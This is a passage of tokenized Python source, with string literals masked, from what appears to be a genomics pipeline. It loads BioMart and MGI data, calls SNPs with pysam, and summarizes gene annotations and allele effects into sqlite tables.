getBM ( attributes = keys , mart = mgi ) <EOL> outf = open ( filename , "<STR_LIT:w>" ) <EOL> outf . write ( "<STR_LIT:\t>" . join ( [ columns [ x ] for x in keys ] ) + "<STR_LIT:\n>" ) <EOL> for data in zip ( * [ result [ x ] for x in keys ] ) : <EOL> outf . write ( "<STR_LIT:\t>" . join ( map ( str , data ) ) + "<STR_LIT:\n>" ) <EOL> outf . close ( ) <EOL> if not os . path . exists ( filename ) : <EOL> R . library ( "<STR_LIT>" ) <EOL> columns = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" } <EOL> def downloadData ( filename , columns ) : <EOL> '''<STR_LIT>''' <EOL> if os . path . exists ( filename ) : return <EOL> E . info ( "<STR_LIT>" % filename ) <EOL> keys = columns . keys ( ) <EOL> mgi = R . useMart ( biomart = "<STR_LIT>" , dataset = "<STR_LIT>" ) <EOL> result = R . getBM ( attributes = keys , <EOL> mart = mgi ) <EOL> if len ( result [ keys [ <NUM_LIT:0> ] ] ) == <NUM_LIT:0> : <EOL> raise ValueError ( "<STR_LIT>" % ( filename , keys ) ) <EOL> outf = open ( filename , "<STR_LIT:w>" ) <EOL> outf . write ( "<STR_LIT:\t>" . join ( [ columns [ x ] for x in keys ] ) + "<STR_LIT:\n>" ) <EOL> for data in zip ( * [ result [ x ] for x in keys ] ) : <EOL> outf . write ( "<STR_LIT:\t>" . join ( map ( str , data ) ) + "<STR_LIT:\n>" ) <EOL> outf . 
close ( ) <EOL> downloadData ( "<STR_LIT>" , <EOL> { "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" } ) <EOL> downloadData ( "<STR_LIT>" , <EOL> { "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" } ) <EOL> downloadData ( "<STR_LIT>" , <EOL> { "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" } ) <EOL> downloadData ( "<STR_LIT>" , <EOL> { "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT:name>" , <EOL> "<STR_LIT>" : "<STR_LIT:type>" , <EOL> } ) <EOL> downloadData ( "<STR_LIT>" , <EOL> { "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT:name>" , <EOL> "<STR_LIT>" : "<STR_LIT:type>" <EOL> } ) <EOL> downloadData ( "<STR_LIT>" , <EOL> { "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" } ) <EOL> for filename in glob . glob ( "<STR_LIT>" ) : <EOL> tablename = filename [ : - len ( "<STR_LIT>" ) ] <EOL> E . info ( "<STR_LIT>" % tablename ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ files ( ( ( None , "<STR_LIT>" ) , ) ) <EOL> def importMGIPhenotypesViaReports ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> mgi_dir = "<STR_LIT>" <EOL> if not os . path . exists ( mgi_dir ) : <EOL> os . 
mkdir ( mgi_dir ) <EOL> conversion = ( <EOL> { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT:filename>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , None , None , None , None ) , <EOL> "<STR_LIT>" : "<STR_LIT:U+0020>" } , <EOL> { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT:filename>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : ( "<STR_LIT>" , None , None , None , None , "<STR_LIT>" ) , <EOL> "<STR_LIT>" : "<STR_LIT:U+0020>" } , <EOL> { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT:filename>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , None , "<STR_LIT>" ) } , <EOL> { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT:filename>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , None , None , None , None ) } , <EOL> { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT:filename>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : ( "<STR_LIT>" , None , None , None , None , <EOL> None , None , None , None , "<STR_LIT>" ) } , <EOL> { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT:filename>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:description>" , ) , <EOL> "<STR_LIT>" : None } , <EOL> ) <EOL> for filename in [ x [ "<STR_LIT:filename>" ] for x in conversion ] : <EOL> target = os . path . join ( mgi_dir , filename ) <EOL> if os . path . exists ( target ) : continue <EOL> E . info ( "<STR_LIT>" % filename ) <EOL> statement = "<STR_LIT>" <EOL> P . run ( ) <EOL> for convert in conversion : <EOL> tablename = convert [ "<STR_LIT>" ] <EOL> tmpfile = P . getTempFile ( "<STR_LIT:.>" ) <EOL> headers , take = [ ] , [ ] <EOL> for x , c in enumerate ( convert [ "<STR_LIT>" ] ) : <EOL> if c != None : <EOL> headers . append ( c ) <EOL> take . append ( x ) <EOL> tmpfile . write ( "<STR_LIT:\t>" . join ( headers ) + "<STR_LIT:\n>" ) <EOL> for line in open ( os . path . 
join ( mgi_dir , convert [ "<STR_LIT:filename>" ] ) ) : <EOL> if line . startswith ( "<STR_LIT:#>" ) : continue <EOL> data = line [ : - <NUM_LIT:1> ] . split ( "<STR_LIT:\t>" ) <EOL> tmpfile . write ( "<STR_LIT:\t>" . join ( [ data [ x ] . strip ( ) for x in take ] ) + "<STR_LIT:\n>" ) <EOL> tmpfile . close ( ) <EOL> E . info ( "<STR_LIT>" % tablename ) <EOL> separator = convert . get ( "<STR_LIT>" , "<STR_LIT:U+002C>" ) <EOL> tmpfilename = tmpfile . name <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> os . unlink ( tmpfilename ) <EOL> @ files ( ( ( PARAMS [ "<STR_LIT>" ] , "<STR_LIT>" ) , ) ) <EOL> def loadGene2Omim ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> tablename = P . toTable ( outfile ) <EOL> columns = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } <EOL> data = PBiomart . biomart_iterator ( columns . keys ( ) <EOL> , biomart = "<STR_LIT>" <EOL> , dataset = "<STR_LIT>" ) <EOL> def transform_data ( data ) : <EOL> for result in data : <EOL> for x in ( "<STR_LIT>" , "<STR_LIT>" ) : <EOL> result [ x ] = ( "<STR_LIT>" , result [ x ] ) [ result [ x ] >= <NUM_LIT:0> ] <EOL> yield result <EOL> PDatabase . importFromIterator ( outfile <EOL> , tablename <EOL> , transform_data ( data ) <EOL> , columns = columns <EOL> , indices = ( "<STR_LIT>" , ) ) <EOL> @ files ( ( ( PARAMS [ "<STR_LIT>" ] , "<STR_LIT>" ) , ) ) <EOL> def loadHumanOrthologs ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> tablename = P . toTable ( outfile ) <EOL> columns = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } <EOL> data = PBiomart . biomart_iterator ( columns . keys ( ) <EOL> , biomart = "<STR_LIT>" <EOL> , dataset = "<STR_LIT>" ) <EOL> PDatabase . 
importFromIterator ( outfile <EOL> , tablename <EOL> , data <EOL> , columns = columns <EOL> , indices = ( "<STR_LIT>" , "<STR_LIT>" , ) ) <EOL> @ files ( ( ( PARAMS [ "<STR_LIT>" ] , "<STR_LIT>" ) , ) ) <EOL> def loadExpressionDataDanecek ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> table = P . toTable ( outfile ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ files ( ( ( PARAMS [ "<STR_LIT>" ] , "<STR_LIT>" ) , ) ) <EOL> def loadExpressionData ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> table = P . toTable ( outfile ) <EOL> dirs = glob . glob ( os . path . join ( infile , "<STR_LIT>" ) ) <EOL> data = [ ] <EOL> genes = set ( ) <EOL> counter = E . Counter ( ) <EOL> for d in dirs : <EOL> basename = os . path . basename ( d ) <EOL> track = "<STR_LIT>" + re . sub ( "<STR_LIT>" , "<STR_LIT>" , basename ) <EOL> track = re . sub ( "<STR_LIT>" , "<STR_LIT>" , track ) <EOL> track = re . sub ( "<STR_LIT>" , "<STR_LIT>" , track ) <EOL> files = glob . glob ( os . path . join ( d , "<STR_LIT>" ) ) <EOL> counter . dirs += <NUM_LIT:1> <EOL> for f in files : <EOL> values = collections . defaultdict ( str ) <EOL> parts = f . split ( "<STR_LIT:/>" ) <EOL> condition = re . sub ( "<STR_LIT>" , "<STR_LIT>" , parts [ - <NUM_LIT:2> ] ) <EOL> reader = CSV . DictReader ( open ( f , "<STR_LIT:r>" ) , dialect = "<STR_LIT>" ) <EOL> for row in reader : <EOL> if row [ "<STR_LIT:status>" ] == "<STR_LIT:OK>" : <EOL> values [ row [ "<STR_LIT>" ] ] = row [ "<STR_LIT>" ] <EOL> data . append ( ( track + "<STR_LIT:_>" + condition , values ) ) <EOL> genes . update ( set ( values . keys ( ) ) ) <EOL> counter . files += <NUM_LIT:1> <EOL> outf = P . getTempFile ( ) <EOL> outf . write ( "<STR_LIT>" + "<STR_LIT:\t>" . join ( [ x [ <NUM_LIT:0> ] for x in data ] ) + "<STR_LIT:\n>" ) <EOL> counter . genes = len ( genes ) <EOL> for gene_id in genes : <EOL> outf . write ( gene_id ) <EOL> for x in range ( len ( data ) ) : <EOL> outf . 
write ( "<STR_LIT>" % data [ x ] [ <NUM_LIT:1> ] [ gene_id ] ) <EOL> outf . write ( "<STR_LIT:\n>" ) <EOL> outf . close ( ) <EOL> E . info ( "<STR_LIT:%s>" % str ( counter ) ) <EOL> tmpfile = outf . name <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> os . unlink ( outf . name ) <EOL> @ split ( loadExpressionData , "<STR_LIT>" ) <EOL> def summarizeExpressionPerGene ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> intable = "<STR_LIT>" <EOL> dbhandle = sqlite3 . connect ( PARAMS [ "<STR_LIT>" ] ) <EOL> columns = Database . getColumnNames ( dbhandle , intable ) <EOL> strains = list ( set ( [ "<STR_LIT:_>" . join ( x . split ( "<STR_LIT:_>" ) [ : - <NUM_LIT:1> ] ) for x in columns if x != "<STR_LIT>" ] ) ) <EOL> total = collections . defaultdict ( list ) <EOL> for strain in strains : <EOL> E . info ( "<STR_LIT>" % strain ) <EOL> per_gene = collections . defaultdict ( list ) <EOL> matched_columns = [ x for x in columns if re . match ( strain , x ) ] <EOL> fields = "<STR_LIT:U+002C>" . join ( matched_columns ) <EOL> statement = '''<STR_LIT>''' % locals ( ) <EOL> cc = dbhandle . cursor ( ) <EOL> for data in cc . execute ( statement ) : <EOL> per_gene [ data [ <NUM_LIT:0> ] ] . extend ( data [ <NUM_LIT:1> : ] ) <EOL> total [ data [ <NUM_LIT:0> ] ] . extend ( data [ <NUM_LIT:1> : ] ) <EOL> outf = open ( "<STR_LIT>" % strain , "<STR_LIT:w>" ) <EOL> outf . write ( "<STR_LIT>" % Stats . Summary ( ) . getHeader ( ) ) <EOL> for gene_id , d in per_gene . iteritems ( ) : <EOL> outf . write ( "<STR_LIT>" % ( gene_id , str ( Stats . Summary ( d ) ) ) ) <EOL> outf . close ( ) <EOL> outf = open ( "<STR_LIT>" , "<STR_LIT:w>" ) <EOL> outf . write ( "<STR_LIT>" % Stats . Summary ( ) . getHeader ( ) ) <EOL> for gene_id , d in total . iteritems ( ) : <EOL> outf . write ( "<STR_LIT>" % ( gene_id , str ( Stats . Summary ( d ) ) ) ) <EOL> outf . 
close ( ) <EOL> @ transform ( summarizeExpressionPerGene , suffix ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def loadExpressionPerGene ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> table = P . toTable ( outfile ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ follows ( indexGenome , loadExpressionData ) <EOL> @ transform ( buildPileups , suffix ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def createSNPValidationData ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> track = infile [ : - len ( "<STR_LIT>" ) ] <EOL> strain = track [ len ( "<STR_LIT>" ) : ] <EOL> pattern = "<STR_LIT>" % ( PARAMS [ "<STR_LIT>" ] , strain ) <EOL> to_cluster = True <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ transform ( createSNPValidationData , suffix ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def loadSNPValidationData ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> table = P . toTable ( outfile ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ merge ( loadSNPValidationData , "<STR_LIT>" ) <EOL> def buildSNPBlacklist ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> dbhandle = sqlite3 . connect ( PARAMS [ "<STR_LIT>" ] ) <EOL> cc = dbhandle . cursor ( ) <EOL> outf = IOTools . openFile ( outfile , "<STR_LIT:w>" ) <EOL> for infile in infiles : <EOL> track = infile [ : - len ( "<STR_LIT>" ) ] <EOL> statement = '''<STR_LIT>''' <EOL> cc . execute ( statement % locals ( ) ) <EOL> for contig , pos in cc : outf . write ( "<STR_LIT>" % ( track , contig , pos ) ) <EOL> outf . close ( ) <EOL> @ files ( ( ( None , "<STR_LIT>" ) , ) ) <EOL> def recallGenomicSNPs ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> filename_bam = "<STR_LIT>" <EOL> dbhandle = sqlite3 . connect ( PARAMS [ "<STR_LIT>" ] ) <EOL> cc = dbhandle . cursor ( ) <EOL> statement = "<STR_LIT>" <EOL> samfile = pysam . Samfile ( filename_bam , "<STR_LIT:rb>" ) <EOL> fastafile = pysam . Fastafile ( "<STR_LIT>" ) <EOL> i = samfile . 
pileup ( select = "<STR_LIT>" , fastafile = fastafile ) <EOL> caller = pysam . SNPCaller ( i ) <EOL> outf = IOTools . openFile ( outfile , "<STR_LIT:w>" ) <EOL> outf . write ( "<STR_LIT:\t>" . join ( ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) ) + "<STR_LIT:\n>" ) <EOL> for contig , pos , ref , genotype , status , genotypes in cc . execute ( statement ) : <EOL> contig = re . sub ( "<STR_LIT>" , "<STR_LIT>" , contig ) <EOL> try : <EOL> call = caller . call ( contig , pos ) <EOL> except ValueError , msg : <EOL> E . warn ( "<STR_LIT>" % ( contig , pos , msg ) ) <EOL> outf . write ( "<STR_LIT:\t>" . join ( map ( str , ( contig , pos , ref , genotype , status , genotypes , <EOL> call . genotype , <EOL> call . consensus_quality , <EOL> call . snp_quality , <EOL> call . mapping_quality , <EOL> call . coverage ) ) ) + "<STR_LIT:\n>" ) <EOL> outf . flush ( ) <EOL> outf . close ( ) <EOL> @ files ( ( ( PARAMS [ "<STR_LIT>" ] , "<STR_LIT>" ) , ) ) <EOL> def loadEnsembl2Uniprot ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> table = P . toTable ( outfile ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ files ( PARAMS [ "<STR_LIT>" ] , PARAMS [ '<STR_LIT>' ] ) <EOL> def buildGeneRegions ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> PGeneset . buildGeneRegions ( infile , outfile ) <EOL> @ follows ( buildGeneRegions ) <EOL> @ files ( PARAMS [ "<STR_LIT>" ] , PARAMS [ '<STR_LIT>' ] ) <EOL> def buildGenes ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> PGeneset . buildProteinCodingGenes ( infile , outfile ) <EOL> @ files ( PARAMS [ "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> def loadGeneInformation ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> PGeneset . loadGeneInformation ( infile , outfile ) <EOL> @ files ( buildGenes , "<STR_LIT>" ) <EOL> def loadGeneStats ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> PGeneset . 
loadGeneStats ( infile , outfile ) <EOL> @ files ( PARAMS [ "<STR_LIT>" ] , PARAMS [ "<STR_LIT>" ] ) <EOL> def buildTranscripts ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> PGeneset . buildProteinCodingTranscripts ( infile , outfile ) <EOL> @ transform ( buildTranscripts , suffix ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def loadTranscripts ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> PGeneset . loadTranscripts ( infile , outfile ) <EOL> @ files ( buildTranscripts , "<STR_LIT>" ) <EOL> def loadTranscriptStats ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> PGeneset . loadTranscriptStats ( infile , outfile ) <EOL> @ files ( PARAMS [ "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> def loadTranscriptInformation ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> PGeneset . loadTranscriptInformation ( infile , <EOL> outfile , <EOL> only_proteincoding = PARAMS [ "<STR_LIT>" ] ) <EOL> @ files ( ( ( PARAMS [ "<STR_LIT>" ] , PARAMS [ "<STR_LIT>" ] ) , ) ) <EOL> def buildPeptideFasta ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> PGeneset . buildPeptideFasta ( infile , outfile ) <EOL> @ files ( ( ( PARAMS [ "<STR_LIT>" ] , PARAMS [ "<STR_LIT>" ] ) , ) ) <EOL> def buildCDNAFasta ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> PGeneset . buildCDNAFasta ( infile , outfile ) <EOL> @ follows ( loadTranscriptInformation ) <EOL> @ files ( [ ( PARAMS [ "<STR_LIT>" ] , PARAMS [ "<STR_LIT>" ] ) , ] ) <EOL> def buildCDSFasta ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> PGeneset . buildCDSFasta ( infile , outfile ) <EOL> @ files ( PARAMS [ "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> def loadProteinStats ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> PGeneset . loadProteinStats ( infile , outfile ) <EOL> @ merge ( ( loadProteinStats , loadTranscriptInformation ) , "<STR_LIT>" ) <EOL> def buildSelenoList ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> dbhandle = sqlite3 . connect ( PARAMS [ "<STR_LIT>" ] ) <EOL> cc = dbhandle . 
cursor ( ) <EOL> statement = '''<STR_LIT>''' <EOL> outf = open ( outfile , "<STR_LIT:w>" ) <EOL> outf . write ( "<STR_LIT>" ) <EOL> outf . write ( "<STR_LIT:\n>" . join ( [ x [ <NUM_LIT:0> ] for x in cc . execute ( statement ) ] ) + "<STR_LIT:\n>" ) <EOL> outf . close ( ) <EOL> @ files ( PARAMS [ "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> def buildBaseAnnotations ( infile , outfile ) : <EOL> """<STR_LIT>""" <EOL> to_cluster = True <EOL> job_queue = "<STR_LIT>" <EOL> dbname = outfile [ : - len ( "<STR_LIT>" ) ] <EOL> statement = """<STR_LIT>""" <EOL> P . run ( ) <EOL> @ files ( PARAMS [ "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> def buildExonAnnotations ( infile , outfile ) : <EOL> """<STR_LIT>""" <EOL> to_cluster = True <EOL> job_queue = "<STR_LIT>" <EOL> statement = """<STR_LIT>""" <EOL> P . run ( ) <EOL> @ files ( PARAMS [ "<STR_LIT>" ] , "<STR_LIT>" , ) <EOL> def buildGeneAnnotations ( infile , outfile ) : <EOL> """<STR_LIT>""" <EOL> statement = """<STR_LIT>""" <EOL> queue = "<STR_LIT>" <EOL> P . run ( ) <EOL> @ files ( buildGeneAnnotations , "<STR_LIT>" ) <EOL> def makeGeneCounts ( infile , outfile ) : <EOL> """<STR_LIT>""" <EOL> statement = """<STR_LIT>""" <EOL> P . run ( ) <EOL> @ follows ( buildBaseAnnotations , buildExonAnnotations ) <EOL> @ transform ( "<STR_LIT>" , <EOL> suffix ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) <EOL> def makeAnnotations ( infile , outfile ) : <EOL> """<STR_LIT>""" <EOL> to_cluster = True <EOL> bases = "<STR_LIT>" <EOL> statement = """<STR_LIT>""" <EOL> P . run ( ) <EOL> @ transform ( makeAnnotations , <EOL> suffix ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' ) <EOL> def loadAnnotations ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> tablename = P . toTable ( outfile ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ transform ( makeAnnotations , <EOL> suffix ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' ) <EOL> def summarizeAnnotations ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> to_cluster = True <EOL> statement = '''<STR_LIT>''' <EOL> P . 
run ( ) <EOL> @ transform ( summarizeAnnotations , <EOL> suffix ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' ) <EOL> def loadAnnotationsSummary ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> tablename = P . toTable ( outfile ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ follows ( buildSelenoList ) <EOL> @ transform ( '<STR_LIT>' , <EOL> suffix ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) <EOL> def makeEffects ( infile , outfile ) : <EOL> """<STR_LIT>""" <EOL> to_cluster = True <EOL> seleno = "<STR_LIT>" <EOL> statement = """<STR_LIT>""" <EOL> P . run ( ) <EOL> @ transform ( makeEffects , <EOL> suffix ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) <EOL> def loadEffects ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> root = infile [ : - len ( "<STR_LIT>" ) ] <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> for suffix in ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ transform ( '<STR_LIT>' , <EOL> suffix ( "<STR_LIT>" ) , <EOL> add_inputs ( buildTranscripts , buildSelenoList ) , <EOL> "<STR_LIT>" ) <EOL> def buildAlleles ( infiles , outfile ) : <EOL> """<STR_LIT>""" <EOL> to_cluster = True <EOL> infile , transcripts , seleno = infiles <EOL> statement = """<STR_LIT>""" <EOL> P . run ( ) <EOL> @ transform ( buildAlleles , <EOL> suffix ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) <EOL> def loadAlleles ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> tablename = outfile [ : - len ( "<STR_LIT>" ) ] <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ transform ( loadAlleles , <EOL> suffix ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) <EOL> def summarizeAllelesPerTranscript ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> tablename = outfile [ : - len ( "<STR_LIT>" ) ] <EOL> track = infile [ : - len ( "<STR_LIT>" ) ] <EOL> dbhandle = sqlite3 . connect ( PARAMS [ "<STR_LIT>" ] ) <EOL> statement = '''<STR_LIT>''' % locals ( ) <EOL> Database . 
executewait ( dbhandle , "<STR_LIT>" % locals ( ) ) <EOL> Database . executewait ( dbhandle , statement ) <EOL> Database . executewait ( dbhandle , "<STR_LIT>" % locals ( ) ) <EOL> Database . executewait ( dbhandle , "<STR_LIT>" % locals ( ) ) <EOL> Database . executewait ( dbhandle , '''<STR_LIT>''' % locals ( ) ) <EOL> Database . executewait ( dbhandle , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % locals ( ) ) <EOL> dbhandle . commit ( ) <EOL> P . touch ( outfile ) <EOL> @ transform ( summarizeAllelesPerTranscript , <EOL> suffix ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) <EOL> def summarizeAllelesPerGene ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> tablename = outfile [ : - len ( "<STR_LIT>" ) ] <EOL> track = infile [ : - len ( "<STR_LIT>" ) ] <EOL> dbhandle = sqlite3 . connect ( PARAMS [ "<STR_LIT>" ] ) <EOL> statement = '''<STR_LIT>''' % locals ( ) <EOL> Database . executewait ( dbhandle , "<STR_LIT>" % locals ( ) ) <EOL> Database . executewait ( dbhandle , statement ) <EOL> Database . executewait ( dbhandle , "<STR_LIT>" % locals ( ) ) <EOL> Database . executewait ( dbhandle , "<STR_LIT>" % locals ( ) ) <EOL> Database . executewait ( dbhandle , '''<STR_LIT>''' % locals ( ) ) <EOL> Database . executewait ( dbhandle , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % locals ( ) ) <EOL> dbhandle . commit ( ) <EOL> P . touch ( outfile ) <EOL> @ merge ( summarizeAllelesPerGene , <EOL> "<STR_LIT>" ) <EOL> def combineSummaryAllelesPerGene ( infiles , outfile ) : <EOL> dbhandle = sqlite3 . connect ( PARAMS [ "<STR_LIT>" ] ) <EOL> tracks = [ x [ : - len ( "<STR_LIT>" ) ] for x in infiles ] <EOL> tablename_prefix = P . toTable ( outfile ) <EOL> fields = "<STR_LIT:U+002CU+0020>" . join ( [ "<STR_LIT>" % x for x in tracks ] ) <EOL> statement_create = '''<STR_LIT>''' <EOL> statement_insert = '''<STR_LIT>''' <EOL> statement_allgenes = "<STR_LIT>" <EOL> for field in ( "<STR_LIT>" , "<STR_LIT>" ) : <EOL> tablename = "<STR_LIT>" % ( tablename_prefix , field ) <EOL> E . 
info ( "<STR_LIT>" % tablename ) <EOL> all_genes = dict ( [ ( x [ <NUM_LIT:0> ] , set ( ) ) <EOL> for x in Database . executewait ( dbhandle , statement_allgenes % locals ( ) ) ] ) <EOL> Database . executewait ( dbhandle , "<STR_LIT>" % locals ( ) ) <EOL> Database . executewait ( dbhandle , statement_create % locals ( ) ) <EOL> for track in tracks : <EOL> statement = """<STR_LIT>""" <EOL> genes = [ x [ <NUM_LIT:0> ] for x in Database . executewait ( dbhandle , statement % locals ( ) ) ] <EOL> for gene in genes : <EOL> all_genes [ gene ] . add ( track ) <EOL> for gene_id , data in all_genes . iteritems ( ) : <EOL> matrix = [ <NUM_LIT:0> ] * len ( tracks ) <EOL> for x , track in enumerate ( tracks ) : <EOL> if track in data : matrix [ x ] = <NUM_LIT:1> <EOL> total = sum ( matrix ) <EOL> matrix = "<STR_LIT:U+002C>" . join ( [ str ( x ) for x in matrix ] ) <EOL> Database . executewait ( dbhandle , statement_insert % locals ( ) ) <EOL> Database . executewait ( dbhandle , <EOL> "<STR_LIT>" % locals ( ) ) <EOL> P . touch ( outfile ) <EOL> @ transform ( loadEffects , <EOL> suffix ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) <EOL> def summarizeEffectsPerGene ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> tablename = outfile [ : - len ( "<STR_LIT>" ) ] <EOL> track = infile [ : - len ( "<STR_LIT>" ) ] <EOL> dbhandle = sqlite3 . connect ( PARAMS [ "<STR_LIT>" ] ) <EOL> statement = '''<STR_LIT>''' % locals ( ) <EOL> Database . executewait ( dbhandle , "<STR_LIT>" % locals ( ) ) <EOL> Database . executewait ( dbhandle , statement ) <EOL> Database . executewait ( dbhandle , "<STR_LIT>" % locals ( ) ) <EOL> dbhandle . commit ( ) <EOL> P . touch ( outfile ) <EOL> @ follows ( buildGeneAnnotations ) <EOL> @ files_re ( glob . glob ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' , <EOL> [ r'<STR_LIT>' , "<STR_LIT>" ] , <EOL> r'<STR_LIT>' ) <EOL> def makeSNPCountsPerGene ( infiles , outfile ) : <EOL> """<STR_LIT>""" <EOL> infile_snps , infile_genes = infiles <EOL> statement = """<STR_LIT>""" <EOL> P . 
